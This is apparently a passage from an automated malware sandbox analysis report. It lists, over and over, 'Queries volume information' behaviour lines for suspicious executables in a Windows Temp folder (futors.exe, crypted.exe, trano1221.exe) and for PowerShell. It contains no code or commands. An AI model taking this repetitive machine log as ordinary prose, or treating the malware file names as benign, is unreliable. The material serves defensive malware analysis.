                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10019520101\dw.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10019520101\dw.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10026630101\v7942.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10026630101\v7942.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10028100101\crypted.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10028100101\crypted.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10028410101\crypted.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10028410101\crypted.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10029600101\mrwipre12.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10029600101\mrwipre12.exe VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeQueries volume information: unknown VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeQueries volume information: unknown VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeQueries volume information: unknown VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeQueries volume information: unknown VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeQueries volume information: unknown VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeQueries volume information: unknown VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeQueries volume information: unknown VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeQueries volume information: unknown VolumeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Key VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Key VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Key VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Key VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Key VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Key VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\PIL VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Pythonwin VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\certifi VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\cryptography-43.0.3.dist-info VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\cryptography-43.0.3.dist-info VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\cryptography-43.0.3.dist-info VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\cryptography-43.0.3.dist-info VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\cryptography-43.0.3.dist-info VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\cryptography-43.0.3.dist-info\license_files VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\cryptography-43.0.3.dist-info VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\pywin32_system32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor\importlib_metadata-8.0.0.dist-info VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor\importlib_metadata-8.0.0.dist-info VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\setuptools\_vendor VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\win32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\win32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\zstandard VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\ucrtbase.dll VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\_ctypes.pyd VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\win32 VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\Pythonwin VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-console-l1-1-0.dll VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-datetime-l1-1-0.dll VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-errorhandling-l1-1-0.dll VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-file-l1-1-0.dll VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-file-l1-2-0.dll VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-file-l2-1-0.dll VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-handle-l1-1-0.dll VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-heap-l1-1-0.dll VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-localization-l1-2-0.dll VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-processenvironment-l1-1-0.dll VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\cryptography-43.0.3.dist-info VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
